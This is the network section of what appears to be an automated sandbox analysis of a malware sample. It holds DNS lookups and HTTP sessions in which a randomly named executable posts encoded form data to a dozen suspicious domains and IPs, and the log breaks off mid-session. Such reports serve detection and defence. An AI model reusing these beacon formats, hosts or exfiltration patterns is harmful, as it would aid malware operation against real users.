                                                    Jul 1, 2024 15:45:41.917356968 CEST192.168.2.81.1.1.10xd2e2Standard query (0)www.yvw66.topA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:55.854392052 CEST192.168.2.81.1.1.10x380aStandard query (0)www.fundraiserstuffies.comA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:08.987983942 CEST192.168.2.81.1.1.10x6b61Standard query (0)www.aquamotricidad.comA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:22.526958942 CEST192.168.2.81.1.1.10x167Standard query (0)www.te74y.topA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:36.120467901 CEST192.168.2.81.1.1.10x3507Standard query (0)www.ngkwnq.xyzA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:49.786616087 CEST192.168.2.81.1.1.10x86e7Standard query (0)www.eoghenluire.comA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:47:03.041403055 CEST192.168.2.81.1.1.10xc8b7Standard query (0)www.poodlemum.comA (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:47:17.057301044 CEST192.168.2.81.1.1.10xc480Standard query (0)www.ajjmamlllqqq.xyzA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 1, 2024 15:44:45.815962076 CEST1.1.1.1192.168.2.80x4ae2No error (0)www.evoolihubs.shop188.114.97.3A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:44:45.815962076 CEST1.1.1.1192.168.2.80x4ae2No error (0)www.evoolihubs.shop188.114.96.3A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:01.544222116 CEST1.1.1.1192.168.2.80x941dNo error (0)www.mycaringfriend.online3.33.244.179A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:15.560376883 CEST1.1.1.1192.168.2.80x6462No error (0)www.marttyes.top203.161.41.207A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:28.815490007 CEST1.1.1.1192.168.2.80xfc01No error (0)www.sponsoraveteran.infosponsoraveteran.infoCNAME (Canonical name)IN (0x0001)false
                                                    Jul 1, 2024 15:45:28.815490007 CEST1.1.1.1192.168.2.80xfc01No error (0)sponsoraveteran.info3.33.130.190A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:28.815490007 CEST1.1.1.1192.168.2.80xfc01No error (0)sponsoraveteran.info15.197.148.33A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:42.284054041 CEST1.1.1.1192.168.2.80xd2e2No error (0)www.yvw66.topyvw66.topCNAME (Canonical name)IN (0x0001)false
                                                    Jul 1, 2024 15:45:42.284054041 CEST1.1.1.1192.168.2.80xd2e2No error (0)yvw66.top38.47.232.185A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:55.893541098 CEST1.1.1.1192.168.2.80x380aNo error (0)www.fundraiserstuffies.comfundraiserstuffies.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 1, 2024 15:45:55.893541098 CEST1.1.1.1192.168.2.80x380aNo error (0)fundraiserstuffies.com3.33.130.190A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:45:55.893541098 CEST1.1.1.1192.168.2.80x380aNo error (0)fundraiserstuffies.com15.197.148.33A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:09.051515102 CEST1.1.1.1192.168.2.80x6b61No error (0)www.aquamotricidad.comaquamotricidad.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 1, 2024 15:46:09.051515102 CEST1.1.1.1192.168.2.80x6b61No error (0)aquamotricidad.com81.88.48.71A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:22.558290005 CEST1.1.1.1192.168.2.80x167No error (0)www.te74y.topte74y.topCNAME (Canonical name)IN (0x0001)false
                                                    Jul 1, 2024 15:46:22.558290005 CEST1.1.1.1192.168.2.80x167No error (0)te74y.top38.47.207.94A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:36.492676020 CEST1.1.1.1192.168.2.80x3507No error (0)www.ngkwnq.xyz35.241.41.54A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:49.939966917 CEST1.1.1.1192.168.2.80x86e7No error (0)www.eoghenluire.comeoghenluire.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 1, 2024 15:46:49.939966917 CEST1.1.1.1192.168.2.80x86e7No error (0)eoghenluire.com76.223.105.230A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:46:49.939966917 CEST1.1.1.1192.168.2.80x86e7No error (0)eoghenluire.com13.248.243.5A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:47:03.056957960 CEST1.1.1.1192.168.2.80xc8b7No error (0)www.poodlemum.compoodlemum.comCNAME (Canonical name)IN (0x0001)false
                                                    Jul 1, 2024 15:47:03.056957960 CEST1.1.1.1192.168.2.80xc8b7No error (0)poodlemum.com3.33.130.190A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:47:03.056957960 CEST1.1.1.1192.168.2.80xc8b7No error (0)poodlemum.com15.197.148.33A (IP address)IN (0x0001)false
                                                    Jul 1, 2024 15:47:17.373507977 CEST1.1.1.1192.168.2.80xc480No error (0)www.ajjmamlllqqq.xyz35.244.172.47A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.evoolihubs.shop
                                                    • www.mycaringfriend.online
                                                    • www.marttyes.top
                                                    • www.sponsoraveteran.info
                                                    • www.yvw66.top
                                                    • www.fundraiserstuffies.com
                                                    • www.aquamotricidad.com
                                                    • www.te74y.top
                                                    • www.ngkwnq.xyz
                                                    • www.eoghenluire.com
                                                    • www.poodlemum.com
                                                    • www.ajjmamlllqqq.xyz

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849712188.114.97.3805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:44:45.829499006 CEST352OUTGET /z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.evoolihubs.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:44:46.319389105 CEST976INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 01 Jul 2024 13:44:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 167
                                                    Connection: close
                                                    Cache-Control: max-age=3600
                                                    Expires: Mon, 01 Jul 2024 14:44:46 GMT
                                                    Location: https://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJupQeFy5Ch4BVKlgPDN8U%2BN%2BKLomEme4rRKAy2AwebAAep9DMRxsMl76x3Hq%2FX0W20R5NJ4Oq6dDMtBw9G6sJa54DJ%2FH5WR6gBUvngPq4o3ezSXgi2YfHAQh1FDgXjsDsfHxwht"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89c6d529190c4237-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.8497133.33.244.179805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:01.553785086 CEST635OUTPOST /4xhu/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.mycaringfriend.online
                                                    Origin: http://www.mycaringfriend.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.mycaringfriend.online/4xhu/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 70 57 4b 41 53 51 42 48 6b 47 35 58 51 42 45 6e 49 39 75 6a 42 75 56 4e 58 53 6b 63 67 53 6b 62 39 6f 31 4c 4d 68 42 54 79 32 30 6f 55 66 35 31 59 37 65 56 56 66 32 59 34 37 67 7a 74 73 38 48 70 75 45 62 75 2f 66 64 39 39 63 42 53 67 78 37 5a 65 6d 52 5a 4d 66 66 63 4a 77 6b 57 32 51 61 4e 73 61 38 66 71 33 4a 46 35 48 38 78 70 4b 56 78 43 51 58 37 71 6d 44 6b 51 66 71 78 54 50 42 37 30 4d 57 2f 6b 38 73 51 66 63 45 2f 51 5a 74 73 32 61 2f 39 49 31 54 37 6a 79 49 44 37 38 67 6e 76 50 34 34 58 35 64 74 6e 4b 55 57 78 6a 52 77 61 78 43 4b 37 56 35 53 66 73 65 34 5a 79 79 69 4e 64 62 6b 63 45 3d
                                                    Data Ascii: hv=pWKASQBHkG5XQBEnI9ujBuVNXSkcgSkb9o1LMhBTy20oUf51Y7eVVf2Y47gzts8HpuEbu/fd99cBSgx7ZemRZMffcJwkW2QaNsa8fq3JF5H8xpKVxCQX7qmDkQfqxTPB70MW/k8sQfcE/QZts2a/9I1T7jyID78gnvP44X5dtnKUWxjRwaxCK7V5Sfse4ZyyiNdbkcE=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.8497143.33.244.179805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:04.094849110 CEST655OUTPOST /4xhu/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.mycaringfriend.online
                                                    Origin: http://www.mycaringfriend.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.mycaringfriend.online/4xhu/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 70 57 4b 41 53 51 42 48 6b 47 35 58 51 68 55 6e 4e 61 36 6a 4a 75 56 4f 59 79 6b 63 37 69 6b 66 39 6f 35 4c 4d 67 45 49 79 6c 41 6f 55 37 39 31 4a 4a 6d 56 53 66 32 59 77 62 67 32 6a 4d 39 46 70 75 5a 6d 75 39 4c 64 39 39 49 42 53 6c 56 37 5a 70 53 65 62 63 66 5a 58 70 77 71 4a 6d 51 61 4e 73 61 38 66 75 66 76 46 34 6a 38 78 35 61 56 2b 41 34 57 6c 61 6d 41 6e 51 66 71 6e 54 50 46 37 30 4d 6b 2f 6d 49 53 51 64 55 45 2f 52 70 74 74 69 47 77 6d 34 31 52 30 44 7a 58 53 70 4e 55 76 66 7a 59 79 78 6c 64 73 32 4f 72 54 48 4f 37 71 34 35 45 4a 37 39 53 53 63 45 6f 39 75 76 61 34 75 4e 72 36 4c 51 50 47 57 6e 41 52 57 70 56 39 71 43 6c 46 53 32 61 6c 6e 30 2f
                                                    Data Ascii: hv=pWKASQBHkG5XQhUnNa6jJuVOYykc7ikf9o5LMgEIylAoU791JJmVSf2Ywbg2jM9FpuZmu9Ld99IBSlV7ZpSebcfZXpwqJmQaNsa8fufvF4j8x5aV+A4WlamAnQfqnTPF70Mk/mISQdUE/RpttiGwm41R0DzXSpNUvfzYyxlds2OrTHO7q45EJ79SScEo9uva4uNr6LQPGWnARWpV9qClFS2aln0/


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.8497153.33.244.179805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:06.626580000 CEST1672OUTPOST /4xhu/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.mycaringfriend.online
                                                    Origin: http://www.mycaringfriend.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.mycaringfriend.online/4xhu/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 70 57 4b 41 53 51 42 48 6b 47 35 58 51 68 55 6e 4e 61 36 6a 4a 75 56 4f 59 79 6b 63 37 69 6b 66 39 6f 35 4c 4d 67 45 49 79 6b 34 6f 58 49 31 31 62 65 79 56 54 66 32 59 2b 37 67 33 6a 4d 39 45 70 75 42 69 75 39 33 4e 39 37 45 42 53 47 74 37 49 6f 53 65 42 4d 66 5a 59 4a 77 6e 57 32 51 50 4e 73 4b 34 66 71 44 76 46 34 6a 38 78 2f 2b 56 35 53 51 57 6e 61 6d 44 6b 51 66 59 78 54 50 39 37 30 45 65 2f 6d 64 70 52 74 30 45 2f 78 35 74 76 52 75 77 71 34 31 58 78 44 7a 66 53 70 42 4c 76 66 76 36 79 78 34 36 73 78 36 72 53 77 32 6c 34 34 78 4f 54 70 70 73 56 65 63 30 6c 63 6e 6b 31 34 64 43 37 59 49 30 4e 54 72 75 52 32 6c 46 34 4b 61 75 63 6d 36 4e 6f 53 52 2b 4b 37 77 33 66 63 37 52 37 53 56 32 30 4f 30 69 4a 37 52 32 63 45 56 42 6d 31 70 64 44 47 63 43 63 35 70 70 70 49 4c 77 4d 33 57 79 62 31 30 2f 66 6f 74 32 34 6f 62 75 31 79 45 6c 79 4c 4f 76 5a 32 75 6f 65 39 59 73 41 2f 78 35 66 65 61 6f 79 53 59 59 68 50 69 79 36 62 4b 6c 4e 55 41 6d 49 51 6b 65 6d 56 4d 67 4c 45 54 7a 45 4b 58 42 35 62 52 [TRUNCATED]
                                                    Data Ascii: hv=pWKASQBHkG5XQhUnNa6jJuVOYykc7ikf9o5LMgEIyk4oXI11beyVTf2Y+7g3jM9EpuBiu93N97EBSGt7IoSeBMfZYJwnW2QPNsK4fqDvF4j8x/+V5SQWnamDkQfYxTP970Ee/mdpRt0E/x5tvRuwq41XxDzfSpBLvfv6yx46sx6rSw2l44xOTppsVec0lcnk14dC7YI0NTruR2lF4Kaucm6NoSR+K7w3fc7R7SV20O0iJ7R2cEVBm1pdDGcCc5pppILwM3Wyb10/fot24obu1yElyLOvZ2uoe9YsA/x5feaoySYYhPiy6bKlNUAmIQkemVMgLETzEKXB5bRxwmXM8UFS7MGjSd5EncyiuivIB4zwZdsmSwRi7x/1c8imZQgcr9Eo3FuMacdEeCbLizA6zsPR9b98kcm+D59AZBFUBO8Yv2OtHTTBPbOZQuGoWy/eUH85aLzQWBRWI5ejjeXy/yjOHoNRx82h5mz+aN1iwStU10AQmi6aEv5QT13fVeNdNvYHsQkCqVtlarsF/auUKwNjzgQ/bGztp22cNV0A2tzObLLSwg1m4PlZt+6H6EBrdfPAX5NGzRZ5EV30ZVzel3MPsbRzFnouDZ2al4XYCo78f6UYYZIltvlDxRYKPe+zGQzrr3B5i3ch34uIvHPWZJYctf2EM8k4QdltAXlkO4wDU3qU7zJsLIO5B8Ip5zyL7NI3BAwaR/a+/ymv60udFgUJfgbHkaRkErKVV3QHlucRGti0//ckfYbXUgPcPs6einowWD+DT4nEhDvjHj1jw5M/5GC0aAItLFaZWFQtyap69aZMx/eQ//+E2AVgGTxsgdRaPr945CzCRlW5PE3r8C7YQa2lrybUlVV8Vsv+FixVDPDcoWFSzsuEvAPKW+/ub5DHyLJ8PzNPO6fCsk+zMrGsOPQ91u8ZYLnJXE62qlWmDeryiidfhvs0RelMULVtO7qeT5eKmFyTSGz3eCSMHAuOQsn0j3dKD/o+Sz5o26VI4mjWu [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.8497163.33.244.179805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:09.157557964 CEST358OUTGET /4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.mycaringfriend.online
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:10.227319956 CEST404INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:45:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 76 3d 6b 55 69 67 52 6b 42 41 71 42 74 31 52 51 34 50 48 4e 75 6b 46 34 78 5a 50 54 6f 48 2b 31 51 49 36 6f 74 51 44 58 4a 43 76 43 59 39 59 62 55 67 66 49 32 52 65 2b 69 53 38 63 34 64 6c 6f 74 2b 67 65 5a 69 33 76 66 54 7a 4c 59 58 5a 48 39 73 57 71 36 6a 54 38 6a 2b 65 59 59 4b 61 41 55 77 4e 66 69 2b 65 4c 72 72 62 75 6d 45 6b 75 2b 33 79 67 78 6f 6e 4c 50 55 6f 68 33 4c 39 68 47 4a 6c 77 3d 3d 26 53 62 7a 64 62 3d 44 76 67 58 57 64 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN"}</script></head></html>
                                                    Jul 1, 2024 15:45:10.227592945 CEST404INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:45:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 76 3d 6b 55 69 67 52 6b 42 41 71 42 74 31 52 51 34 50 48 4e 75 6b 46 34 78 5a 50 54 6f 48 2b 31 51 49 36 6f 74 51 44 58 4a 43 76 43 59 39 59 62 55 67 66 49 32 52 65 2b 69 53 38 63 34 64 6c 6f 74 2b 67 65 5a 69 33 76 66 54 7a 4c 59 58 5a 48 39 73 57 71 36 6a 54 38 6a 2b 65 59 59 4b 61 41 55 77 4e 66 69 2b 65 4c 72 72 62 75 6d 45 6b 75 2b 33 79 67 78 6f 6e 4c 50 55 6f 68 33 4c 39 68 47 4a 6c 77 3d 3d 26 53 62 7a 64 62 3d 44 76 67 58 57 64 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.849717203.161.41.207805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:15.569847107 CEST608OUTPOST /o2rg/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.marttyes.top
                                                    Origin: http://www.marttyes.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.marttyes.top/o2rg/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 4b 71 45 4a 6f 61 4f 63 6f 50 6f 74 61 33 52 68 65 65 48 51 43 61 7a 67 43 76 70 69 78 62 74 77 43 4e 6c 7a 4c 43 41 39 6f 32 2b 36 44 6c 46 2b 57 66 64 48 33 31 37 64 34 71 6c 63 6c 47 52 43 4a 47 57 65 6a 36 78 5a 57 57 2f 46 4a 31 68 65 6d 4b 5a 53 43 54 6c 4f 69 53 58 64 79 2f 2f 35 4b 66 6d 75 71 49 6f 56 48 54 58 79 37 53 34 70 73 62 5a 73 41 4a 56 71 56 56 4e 46 63 6a 30 50 41 72 78 38 32 2b 36 4a 46 47 4e 79 68 54 48 51 31 37 61 4e 6c 68 52 70 59 37 65 4b 74 51 59 67 30 44 71 67 42 51 76 36 48 78 4c 46 77 32 64 4d 2b 71 4a 78 58 6a 45 37 77 4b 72 45 4e 78 51 58 54 69 36 5a 47 78 38 3d
                                                    Data Ascii: hv=KqEJoaOcoPota3RheeHQCazgCvpixbtwCNlzLCA9o2+6DlF+WfdH317d4qlclGRCJGWej6xZWW/FJ1hemKZSCTlOiSXdy//5KfmuqIoVHTXy7S4psbZsAJVqVVNFcj0PArx82+6JFGNyhTHQ17aNlhRpY7eKtQYg0DqgBQv6HxLFw2dM+qJxXjE7wKrENxQXTi6ZGx8=
                                                    Jul 1, 2024 15:45:16.198968887 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:16 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.849719203.161.41.207805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:18.110457897 CEST628OUTPOST /o2rg/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.marttyes.top
                                                    Origin: http://www.marttyes.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.marttyes.top/o2rg/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 4b 71 45 4a 6f 61 4f 63 6f 50 6f 74 61 58 68 68 66 2f 48 51 41 36 7a 68 4f 50 70 69 71 72 74 30 43 4e 70 7a 4c 44 30 54 6f 45 4b 36 44 45 31 2b 56 61 78 48 30 31 37 64 33 4b 6c 64 6f 6d 51 4f 4a 47 71 67 6a 37 4e 5a 57 57 37 46 4a 30 52 65 6d 39 46 52 42 6a 6c 41 37 43 58 66 38 66 2f 35 4b 66 6d 75 71 49 73 2f 48 54 50 79 34 69 49 70 75 2f 4e 74 66 35 56 70 43 6c 4e 46 59 6a 31 6e 41 72 78 61 32 38 50 6b 46 45 46 79 68 58 44 51 31 75 75 4f 72 68 52 76 48 4c 66 59 6d 53 55 70 7a 6b 75 6e 4e 52 66 62 42 48 4c 41 31 41 77 6d 6b 49 42 33 55 6a 73 51 77 4a 44 79 49 47 4e 2f 4a 42 71 70 59 6d 6f 43 4f 47 63 32 74 4e 78 6f 68 63 66 69 74 6a 51 2b 68 74 78 5a
                                                    Data Ascii: hv=KqEJoaOcoPotaXhhf/HQA6zhOPpiqrt0CNpzLD0ToEK6DE1+VaxH017d3KldomQOJGqgj7NZWW7FJ0Rem9FRBjlA7CXf8f/5KfmuqIs/HTPy4iIpu/Ntf5VpClNFYj1nArxa28PkFEFyhXDQ1uuOrhRvHLfYmSUpzkunNRfbBHLA1AwmkIB3UjsQwJDyIGN/JBqpYmoCOGc2tNxohcfitjQ+htxZ
                                                    Jul 1, 2024 15:45:18.702887058 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:18 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
